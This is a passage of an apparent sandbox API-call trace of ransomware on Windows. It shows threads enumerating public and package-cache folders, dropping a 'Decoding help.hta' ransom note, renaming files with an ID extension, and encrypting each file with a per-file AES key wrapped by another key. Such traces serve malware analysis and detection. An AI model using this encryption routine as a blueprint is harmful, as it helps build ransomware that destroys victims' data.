(hFileMappingObject=0x2bc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x40) returned 0x3950000 [0044.190] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1229fbe4*, pdwDataLen=0x1229fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1229fbe4*, pdwDataLen=0x1229fcf8*=0x100) returned 1 [0047.278] CryptEncrypt (in: hKey=0x5a5ff0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3950000*, pdwDataLen=0x1229fce4*=0x40, dwBufLen=0x40 | out: pbData=0x3950000*, pdwDataLen=0x1229fce4*=0x40) returned 1 [0047.278] UnmapViewOfFile (lpBaseAddress=0x3950000) returned 1 [0047.279] CloseHandle (hObject=0x2bc) returned 1 [0047.280] CryptDestroyKey (hKey=0x5a5ff0) returned 1 [0047.280] CryptReleaseContext (hProv=0x34499b8, dwFlags=0x0) returned 1 [0047.280] SetFilePointerEx (in: hFile=0x45c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0047.280] WriteFile (in: hFile=0x45c, lpBuffer=0x1229fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1229fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1229fbe4*, lpNumberOfBytesWritten=0x1229fcf8*=0x100, lpOverlapped=0x0) returned 1 [0047.626] WriteFile (in: hFile=0x45c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1229fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1229fcf8*=0x500, lpOverlapped=0x0) returned 1 [0047.626] CloseHandle (hObject=0x45c) returned 1 [0047.627] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0050.369] FindNextFileW (in: hFindFile=0x5a5f70, lpFindFileData=0x1229fd30 | out: lpFindFileData=0x1229fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Media", cAlternateFileName="SAMPLE~1")) returned 1 [0050.369] lstrcmpW (lpString1=".", lpString2="Sample Media") returned -1 [0050.370] lstrcmpW (lpString1="..", lpString2="Sample Media") returned -1 [0050.370] lstrcmpiW (lpString1="windows", lpString2="Sample Media") returned 1 [0050.370] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Recorded TV\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\*.*") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\*.*" [0050.370] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Recorded TV\\*.*") returned 35 [0050.370] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\", lpString2="Sample Media" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media" [0050.370] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\*.*") returned="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\*.*" [0050.370] GlobalMemoryStatus (in: lpBuffer=0x1229fd10 | out: lpBuffer=0x1229fd10) [0050.370] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9adb208, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x198 [0050.371] CloseHandle (hObject=0x198) returned 1 [0050.371] FindNextFileW (in: hFindFile=0x5a5f70, lpFindFileData=0x1229fd30 | out: lpFindFileData=0x1229fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Media", cAlternateFileName="SAMPLE~1")) returned 0 [0050.371] FindClose (in: hFindFile=0x5a5f70 | out: hFindFile=0x5a5f70) returned 1 Thread: id = 233 os_tid = 0x6b4 [0040.547] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\*.*", lpFindFileData=0x69cfd30 | out: lpFindFileData=0x69cfd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5fb0 [0040.547] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.547] FindNextFileW (in: hFindFile=0x5a5fb0, lpFindFileData=0x69cfd30 | out: lpFindFileData=0x69cfd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.547] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.547] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.547] FindNextFileW (in: hFindFile=0x5a5fb0, lpFindFileData=0x69cfd30 | out: lpFindFileData=0x69cfd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.548] lstrcpyW (in: lpString1=0x11077800, lpString2="\\\\?\\C:\\Users\\Public\\Videos\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\*.*") returned="\\\\?\\C:\\Users\\Public\\Videos\\*.*" [0040.548] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Videos\\*.*") returned 30 [0040.548] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Public\\Videos\\Decoding help.hta" [0040.548] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Decoding help.hta" (normalized: "c:\\users\\public\\videos\\decoding help.hta")) returned 0xffffffff [0040.548] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Decoding help.hta" (normalized: "c:\\users\\public\\videos\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0040.803] WriteFile (in: hFile=0x334, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x69cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x69cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.804] CloseHandle (hObject=0x334) returned 1 [0040.804] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.265] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0041.265] lstrlenW (lpString="desktop.ini") returned 11 [0041.265] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Videos\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\*.*") returned="\\\\?\\C:\\Users\\Public\\Videos\\*.*" [0041.265] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Videos\\*.*") returned 30 [0041.265] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini") returned="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini" [0041.265] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini") returned="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini" [0041.265] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0041.265] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\public\\videos\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\public\\videos\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0041.266] CreateFileMappingA (hFile=0x448, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x44c [0041.266] CryptAcquireContextA (in: phProv=0x69cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x69cfcec*=0x34498a8) returned 1 [0043.834] CryptGenKey (in: hProv=0x34498a8, Algid=0x6610, dwFlags=0x1, phKey=0x69cfce8 | out: phKey=0x69cfce8*=0x5d8850) returned 1 [0043.835] CryptExportKey (in: hKey=0x5d8850, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x69cfbe4, pdwDataLen=0x69cfce4 | out: pbData=0x69cfbe4*, pdwDataLen=0x69cfce4*=0x2c) returned 1 [0043.835] MapViewOfFile (hFileMappingObject=0x44c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x160) returned 0x4a40000 [0044.124] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x69cfbe4*, pdwDataLen=0x69cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x69cfbe4*, pdwDataLen=0x69cfcf8*=0x100) returned 1 [0047.092] CryptEncrypt (in: hKey=0x5d8850, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4a40000*, pdwDataLen=0x69cfce4*=0x160, dwBufLen=0x160 | out: pbData=0x4a40000*, pdwDataLen=0x69cfce4*=0x160) returned 1 [0047.092] UnmapViewOfFile (lpBaseAddress=0x4a40000) returned 1 [0047.093] CloseHandle (hObject=0x44c) returned 1 [0047.093] CryptDestroyKey (hKey=0x5d8850) returned 1 [0047.093] CryptReleaseContext (hProv=0x34498a8, dwFlags=0x0) returned 1 [0047.093] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0047.093] WriteFile (in: hFile=0x448, lpBuffer=0x69cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x69cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x69cfbe4*, lpNumberOfBytesWritten=0x69cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0047.612] WriteFile (in: hFile=0x448, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x69cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x69cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0047.613] CloseHandle (hObject=0x448) returned 1 [0047.613] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0051.165] FindNextFileW (in: hFindFile=0x5a5fb0, lpFindFileData=0x69cfd30 | out: lpFindFileData=0x69cfd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 1 [0051.165] lstrcmpW (lpString1=".", lpString2="Sample Videos") returned -1 [0051.165] lstrcmpW (lpString1="..", lpString2="Sample Videos") returned -1 [0051.165] lstrcmpiW (lpString1="windows", lpString2="Sample Videos") returned 1 [0051.165] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Videos\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\*.*") returned="\\\\?\\C:\\Users\\Public\\Videos\\*.*" [0051.165] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Videos\\*.*") returned 30 [0051.165] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\", lpString2="Sample Videos" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos") returned="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos" [0051.165] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\*.*") returned="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\*.*" [0051.165] GlobalMemoryStatus (in: lpBuffer=0x69cfd10 | out: lpBuffer=0x69cfd10) [0051.165] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5d08590, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x58c [0051.166] CloseHandle (hObject=0x58c) returned 1 [0051.166] FindNextFileW (in: hFindFile=0x5a5fb0, lpFindFileData=0x69cfd30 | out: lpFindFileData=0x69cfd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 0 [0051.166] FindClose (in: hFindFile=0x5a5fb0 | out: hFindFile=0x5a5fb0) returned 1 Thread: id = 234 os_tid = 0x508 [0040.548] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*.*", lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2924cac0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5ff0 [0040.549] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.549] FindNextFileW (in: hFindFile=0x5a5ff0, lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2924cac0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.549] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.549] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.549] FindNextFileW (in: hFindFile=0x5a5ff0, lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0040.549] lstrcmpW (lpString1=".", lpString2="packages") returned -1 [0040.549] lstrcmpW (lpString1="..", lpString2="packages") returned -1 [0040.549] lstrcmpiW (lpString1="windows", lpString2="packages") returned 1 [0040.551] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*.*" [0040.551] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\*.*") returned 77 [0040.551] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\", lpString2="packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages" [0040.551] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\*.*" [0040.551] GlobalMemoryStatus (in: lpBuffer=0x700fd10 | out: lpBuffer=0x700fd10) [0040.551] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x1107f808, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2c0 [0040.552] CloseHandle (hObject=0x2c0) returned 1 [0040.552] FindNextFileW (in: hFindFile=0x5a5ff0, lpFindFileData=0x700fd30 | out: lpFindFileData=0x700fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29272c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0040.552] FindClose (in: hFindFile=0x5a5ff0 | out: hFindFile=0x5a5ff0) returned 1 Thread: id = 235 os_tid = 0x4a4 [0040.553] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*.*", lpFindFileData=0x78cfd30 | out: lpFindFileData=0x78cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa938e870, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8a90 [0042.090] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.090] FindNextFileW (in: hFindFile=0x5d8a90, lpFindFileData=0x78cfd30 | out: lpFindFileData=0x78cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa938e870, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.090] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.090] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.090] FindNextFileW (in: hFindFile=0x5d8a90, lpFindFileData=0x78cfd30 | out: lpFindFileData=0x78cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0042.090] lstrcmpW (lpString1=".", lpString2="packages") returned -1 [0042.090] lstrcmpW (lpString1="..", lpString2="packages") returned -1 [0042.090] lstrcmpiW (lpString1="windows", lpString2="packages") returned 1 [0042.091] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*.*" [0042.091] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*.*") returned 77 [0042.091] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\", lpString2="packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages" [0042.091] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*.*" [0042.091] GlobalMemoryStatus (in: lpBuffer=0x78cfd10 | out: lpBuffer=0x78cfd10) [0042.091] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5db0868, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x53c [0042.091] CloseHandle (hObject=0x53c) returned 1 [0042.092] FindNextFileW (in: hFindFile=0x5d8a90, lpFindFileData=0x78cfd30 | out: lpFindFileData=0x78cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0042.092] FindClose (in: hFindFile=0x5d8a90 | out: hFindFile=0x5d8a90) returned 1 Thread: id = 236 os_tid = 0x694 [0040.554] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*.*", lpFindFileData=0x7a0fd30 | out: lpFindFileData=0x7a0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb49460, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcb95720, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcb95720, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8a90 [0042.088] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.088] FindNextFileW (in: hFindFile=0x5d8a90, lpFindFileData=0x7a0fd30 | out: lpFindFileData=0x7a0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb49460, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcb95720, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcb95720, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.088] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.088] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.088] FindNextFileW (in: hFindFile=0x5d8a90, lpFindFileData=0x7a0fd30 | out: lpFindFileData=0x7a0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcb95720, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcb95720, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0042.088] lstrcmpW (lpString1=".", lpString2="packages") returned -1 [0042.088] lstrcmpW (lpString1="..", lpString2="packages") returned -1 [0042.088] lstrcmpiW (lpString1="windows", lpString2="packages") returned 1 [0042.089] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*.*" [0042.089] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*.*") returned 86 [0042.089] lstrcatW (in: 